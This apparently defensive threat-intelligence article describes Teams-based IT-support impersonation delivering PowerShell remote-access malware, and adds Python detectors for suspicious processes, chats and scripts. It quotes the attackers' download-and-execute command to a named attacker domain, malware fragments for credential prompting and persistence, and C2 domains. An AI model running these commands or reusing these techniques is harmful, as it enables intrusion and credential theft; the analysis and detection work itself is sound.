Microsoft Teams Abused in Cyberattack Delivering PowerShell-Based Remote Access Malware

In a concerning development for enterprise security, cybercriminals have begun exploiting Microsoft Teams—long trusted as an internal messaging and collaboration tool—to deliver PowerShell-based malware and gain unauthorized remote access to Windows systems.

By impersonating IT support personnel and leveraging social engineering, these threat actors bypass traditional email filters and network defenses, striking directly at deep-seated user trust in everyday collaboration platforms.

Since its launch in 2017, Microsoft Teams has become indispensable for organizations worldwide, handling chat, meetings, file sharing, and more.

Threat actors are now capitalizing on Teams’ ubiquity by creating new or compromising existing Teams tenants, then initiating voice or chat sessions under the guise of “IT SUPPORT,” “Help Desk,” or custom names embellished with checkmark emojis to convey legitimacy.

These accounts typically rely on Microsoft’s onmicrosoft.com domain and generic prefixes such as “admin” or “supportbotit,” signaling automated or bulk account creation.

Once a Teams session is accepted—often framed as a routine performance check or maintenance call—the attacker directs the victim to install remote access tools like QuickAssist or AnyDesk.

Through these legitimate utilities, the adversary then takes control of the endpoint. Unlike earlier campaigns linked to BlackBasta ransomware, which began with mass email blasts before a Teams follow-up, some recent attacks skip email entirely, initiating directly via Teams. These variations suggest multiple actor groups or evolving tactics.

After establishing remote control, attackers execute a PowerShell payload delivered through a command such as:

```powershell
powershell.exe -ExecutionPolicy Bypass -WindowsStyle Hidden -Command "Invoke-RestMethod -Uri https://audiorealteak.com/payload/build.ps1/iex"
```

This multi-stage script provides credential theft, persistence, system reconnaissance, and remote code execution.
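The launch command quoted above is the most exposed point of the chain for a defender: a process-creation record (Windows event 4688 or Sysmon event ID 1) captures the full command line together with the parent process, and here the parent is the remote-access tool the victim was talked into installing. The following Python is an added example, not code from the article or from Permiso, that scores such records for the combination of traits the article describes: an execution-policy bypass, a hidden window, a download cradle piped into Invoke-Expression, and a remote-access tool as the parent. The event field names and the sample records are constructed for the example (the URL is a placeholder, not the article's domain), and the set of remote-access executable names is an assumption.

```python
import ntpath
import re

# Parent-process names for the remote-access tools the article names (assumed executable names).
REMOTE_ACCESS_TOOLS = {"anydesk.exe", "quickassist.exe"}

# Each indicator is a regex applied to the lower-cased command line.
INDICATORS = {
    # -ExecutionPolicy Bypass and the abbreviations PowerShell accepts (-ep, -ex)
    "execution_policy_bypass": r"-e(?:xecutionpolicy|p|x)\s+bypass",
    # -WindowStyle Hidden (-w hidden); also matches the "-WindowsStyle" spelling quoted in the article
    "hidden_window": r"-w(?:indows?style)?\s+hidden",
    # download cradles that fetch script text from a URL
    "download_cradle": r"invoke-restmethod|invoke-webrequest|\birm\b|\biwr\b|downloadstring|downloadfile",
    # execution of whatever text was fetched
    "invoke_expression": r"\biex\b|invoke-expression",
}

# Constructed sample process-creation records (simplified, assumed schema; not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\AnyDesk\AnyDesk.exe",
     "cmdline": 'powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command '
                '"Invoke-RestMethod -Uri https://placeholder.invalid/payload/build.ps1 | iex"'},
    {"pid": 5011,  # a bypass on its own is common in legitimate scheduled scripts
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"pid": 6230,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Service"},
]


def analyze_event(event):
    """Return the indicator names that fire for one process-creation record, in INDICATORS order."""
    cmd = event["cmdline"].lower()
    reasons = [name for name, pattern in INDICATORS.items() if re.search(pattern, cmd)]
    # ntpath handles Windows separators regardless of the platform the analysis runs on
    parent = ntpath.basename(event.get("parent_image", "")).lower()
    if parent in REMOTE_ACCESS_TOOLS:
        reasons.append("remote_access_tool_parent")
    return reasons


def is_suspicious(reasons):
    """A cradle feeding iex is enough on its own; otherwise require three traits together."""
    found = set(reasons)
    return {"download_cradle", "invoke_expression"} <= found or len(found) >= 3


def triage(events):
    """Map pid -> fired indicators for every record worth escalating."""
    escalate = {}
    for event in events:
        reasons = analyze_event(event)
        if is_suspicious(reasons):
            escalate[event["pid"]] = reasons
    return escalate


if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_EVENTS).items():
        print(f"pid {pid}: {', '.join(reasons)}")
```

The second sample shows why the rule keys on the combination rather than on any single switch: an execution-policy bypass by itself is routine in administrative scheduled tasks, whereas a cradle piped into Invoke-Expression under a remote-access tool is the shape of this campaign.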

Early in the script, unique hard-coded AES parameters—$iv = "&9*zS7LY%ZN1thfI" and $key = "123456789012345678901234r0hollah"—allow defenders to pivot investigations and link to previous scripts attributed to the financially motivated EncryptHub group, also known as Water Gamayun or LARVA-208.

OSINT reporting ties this group to zero-day exploitation of CVE-2025-26633 (MSC EvilTwin) and bespoke malware families including SilentPrism and DarkWisp.

Upon execution, the malware enforces single-instance operation via a global mutex:

```powershell
$AppId = "62088a7b-ae9f-2333-77a-6e9c921cb48e"
$script:SingleInstanceEvent = New-Object Threading.EventWaitHandle $true, …
```

It then compiles and injects C# to call RtlSetProcessIsCritical from ntdll.dll, marking the PowerShell process as critical so that termination triggers a system crash, complicating incident response.

A SystemInfo function gathers host details—public IP, hardware UUID, operating system data—formats it as JSON, encrypts it with AES, and exfiltrates to the attacker’s C2 endpoint.

For credential theft, the script invokes a native Windows credential prompt:

```powershell
$D = $Host.UI.PromptForCredential("Need credentials", …)
```

This seamless integration with the Windows UI lowers user suspicion. Retrieved credentials are saved to info.txt under the user’s AppData directory.

Persistence is achieved by first attempting to register a scheduled task named “Google LLC Updater” to run the payload at logon, then falling back to a registry Run key if the task registration fails.

Both methods fetch the next-stage script from a backup domain (https://cjhsbam[.]com/payload/runner.ps1), ensuring resilience against takedown attempts.

All C2 communications are encrypted using the hard-coded AES key and IV, sent to https://audiorealtek[.]com/, with responses decrypted and executed as PowerShell jobs.

Enterprises using Permiso can leverage built-in detections such as P0_M365_TEAMS_CHAT_CREATED_BY_SUSPICIOUS_EXTERNAL_USER_1 and P0_M365_TEAMS_CHAT_MEMBER_NAME_SUSPICIOUS_CHARACTER_1 to identify suspicious Teams interactions.
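The naming patterns described earlier (an external onmicrosoft.com tenant, generic prefixes such as "admin" or "supportbot", display names like "IT SUPPORT" or "Help Desk", and checkmark emojis) translate directly into rules over Teams chat-creation events, which is the kind of signal the two Permiso detections named above key on. The following Python is an added example, not Permiso's rule logic or any vendor's code, that applies those heuristics to chat-creation records. The record schema (sender, display name, recipient), the sample events and the home domain are constructed for the example, and the thresholds in is_suspicious_chat are an assumption.

```python
import re
import unicodedata

# Heuristics drawn from the naming patterns the article describes.
IMPERSONATION = re.compile(r"\b(?:it\s*support|help\s*desk|service\s*desk)\b", re.IGNORECASE)
GENERIC_PREFIX = re.compile(r"^(?:admin|support|helpdesk)", re.IGNORECASE)

# Constructed home tenant and chat-creation records (assumed simplified schema, not real audit-log data).
HOME_DOMAINS = {"example.com"}
SAMPLE_CHATS = [
    {"sender": "supportbotit@helpdesk-contoso.onmicrosoft.com", "display_name": "IT SUPPORT \u2705",
     "recipient": "alice@example.com"},
    {"sender": "bob@example.com", "display_name": "Bob Jones", "recipient": "alice@example.com"},
    {"sender": "jane@partner-corp.com", "display_name": "Jane Doe", "recipient": "alice@example.com"},
    {"sender": "admin@fabrikam.onmicrosoft.com", "display_name": "Admin", "recipient": "alice@example.com"},
    # an internal help desk that happens to use a checkmark: same name traits, but not external
    {"sender": "helpdesk@example.com", "display_name": "Help Desk \u2714", "recipient": "alice@example.com"},
]


def symbol_characters(display_name):
    """Characters in Unicode category 'So' (Symbol, other), where checkmarks and most emoji glyphs live."""
    return [ch for ch in display_name if unicodedata.category(ch) == "So"]


def assess_chat(event, home_domains):
    """Return the reasons one new chat resembles the IT-support impersonation pattern."""
    sender = event["sender"].lower()
    local_part, _, domain = sender.partition("@")
    reasons = []
    if domain not in home_domains:
        reasons.append("external sender")
        if domain.endswith(".onmicrosoft.com"):
            reasons.append("default onmicrosoft.com tenant domain")
    if GENERIC_PREFIX.match(local_part):
        reasons.append("generic automated-looking account prefix")
    if IMPERSONATION.search(event["display_name"]):
        reasons.append("display name impersonates IT support")
    if symbol_characters(event["display_name"]):
        reasons.append("symbol characters in display name")
    return reasons


def is_suspicious_chat(reasons):
    """Internal senders are never flagged; an external sender needs one strong or both weak signals."""
    found = set(reasons)
    if "external sender" not in found:
        return False
    strong = {"display name impersonates IT support", "symbol characters in display name"}
    weak = {"default onmicrosoft.com tenant domain", "generic automated-looking account prefix"}
    return bool(found & strong) or weak <= found


def flagged_senders(events, home_domains):
    """Senders whose chat creation should be reviewed, in event order."""
    return [e["sender"] for e in events if is_suspicious_chat(assess_chat(e, home_domains))]


if __name__ == "__main__":
    for event in SAMPLE_CHATS:
        print(event["sender"], "->", assess_chat(event, HOME_DOMAINS))
    print("flagged:", flagged_senders(SAMPLE_CHATS, HOME_DOMAINS))
```

The last sample record is the reason the external-sender check gates everything else: a genuine internal help desk can legitimately carry the same display-name traits, and what makes the article's pattern distinctive is that the "IT support" identity arrives from a tenant the organization does not own.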

As threat actors continue to pivot to collaboration platforms, organizations must reinforce security awareness around external chats and voice calls, enforce strict tenant-allow/block lists, and monitor for anomalous account creations within Microsoft Teams.

Proactive detection of hard-coded cryptographic artifacts and unusual process protections in PowerShell scripts can provide crucial early warning of these evolving social engineering threats.
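The artifacts catalogued above (the fixed AES key and IV, the critical-process call, the credential prompt, the single-instance handle, the "Google LLC Updater" task, the Run key and the download cradle to the backup domain) are all literal strings a defender can search for in captured PowerShell. The following Python is an added example, not code from the article or from any vendor, that scans script text for them: a generic check for string literals assigned to $iv or $key with AES-sized lengths, regexes for the API and persistence names listed in the article, and an exact match against the key and IV values quoted earlier, which ties a sample to this campaign. The sample scripts are constructed, inert fragments with placeholder values, and the thresholds in is_high_risk are an assumption.

```python
import re

# Exact values quoted in the article; matching them links a sample to the reported campaign.
KNOWN_ARTIFACTS = {
    "&9*zS7LY%ZN1thfI": "hard-coded AES IV reported in the article",
    "123456789012345678901234r0hollah": "hard-coded AES key reported in the article",
}

# $iv / $key (optionally script:/global: scoped) assigned a double-quoted literal.
AES_ASSIGNMENT = re.compile(r'\$(?:script:|global:)?(iv|key)\s*=\s*"([^"]*)"', re.IGNORECASE)
AES_LENGTHS = {16, 24, 32}  # 16-byte IV; 128/192/256-bit keys

# Generic behaviours from the article, as regex -> description.
INDICATORS = {
    r"RtlSetProcessIsCritical": "marks its own process critical (RtlSetProcessIsCritical)",
    r"PromptForCredential": "native credential prompt (PromptForCredential)",
    r"Threading\.(?:EventWaitHandle|Mutex)": "single-instance handle (EventWaitHandle/Mutex)",
    r"Register-ScheduledTask|schtasks(?:\.exe)?\s": "scheduled-task persistence",
    r'"Google LLC Updater"': "scheduled-task name reported in the article",
    r"CurrentVersion\\Run\b": "Run-key persistence",
    r"(?:Invoke-RestMethod|Invoke-WebRequest|\birm|\biwr)\b[^\n]*\|\s*(?:iex|Invoke-Expression)\b":
        "download cradle piped into Invoke-Expression",
    r"Cryptography\.(?:Aes|AesManaged|AesCryptoServiceProvider)\b": "AES crypto class",
}

# Constructed, inert fragment carrying the article's traits with placeholder values; not a working script.
SUSPICIOUS_SAMPLE = r'''
$iv = "0123456789abcdef"
$key = "00112233445566778899aabbccddeeff"
$AppId = "00000000-0000-0000-0000-000000000000"
$script:SingleInstanceEvent = New-Object Threading.EventWaitHandle $true, "ManualReset", "Global\$AppId"
Add-Type -TypeDefinition "[DllImport(""ntdll.dll"")] public static extern int RtlSetProcessIsCritical(...)"
$aes = [System.Security.Cryptography.Aes]::Create()
$D = $Host.UI.PromptForCredential("Need credentials", "...", $env:USERNAME, "")
Register-ScheduledTask -TaskName "Google LLC Updater" -Trigger $trigger -Action $action
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Updater" -Value $cmd
Invoke-RestMethod -Uri https://backup.placeholder.invalid/payload/runner.ps1 | iex
'''

# Constructed benign admin script: a short "$key" literal must not trip the AES check.
BENIGN_SAMPLE = r'''
$key = "api-key-placeholder"
Get-ChildItem C:\Logs -Recurse | Where-Object Length -gt 1MB | Export-Csv big.csv
'''

# Only the two values quoted in the article, to show the exact-match path.
KNOWN_IOC_SAMPLE = r'''
$iv = "&9*zS7LY%ZN1thfI"
$key = "123456789012345678901234r0hollah"
'''


def scan_script(text):
    """Collect behaviour indicators, AES-sized literal key/IV assignments and known-artifact hits."""
    report = {"indicators": [], "hardcoded_aes": [], "known_artifacts": []}
    for pattern, description in INDICATORS.items():
        if re.search(pattern, text, re.IGNORECASE):
            report["indicators"].append(description)
    for name, value in AES_ASSIGNMENT.findall(text):
        if len(value) in AES_LENGTHS:
            report["hardcoded_aes"].append((name.lower(), len(value)))
        if value in KNOWN_ARTIFACTS:
            report["known_artifacts"].append(KNOWN_ARTIFACTS[value])
    return report


def is_high_risk(report):
    """Known campaign values decide outright; otherwise a literal AES key plus two behaviours."""
    if report["known_artifacts"]:
        return True
    return bool(report["hardcoded_aes"]) and len(report["indicators"]) >= 2


if __name__ == "__main__":
    for label, sample in [("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE), ("known", KNOWN_IOC_SAMPLE)]:
        report = scan_script(sample)
        print(label, "high risk" if is_high_risk(report) else "ok", report)
```

Because the key and IV are string literals in the script rather than derived at run time, the length check catches fresh variants that rotate the values, while the exact-match table ties a sample back to the reported campaign the way the article describes pivoting on them.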
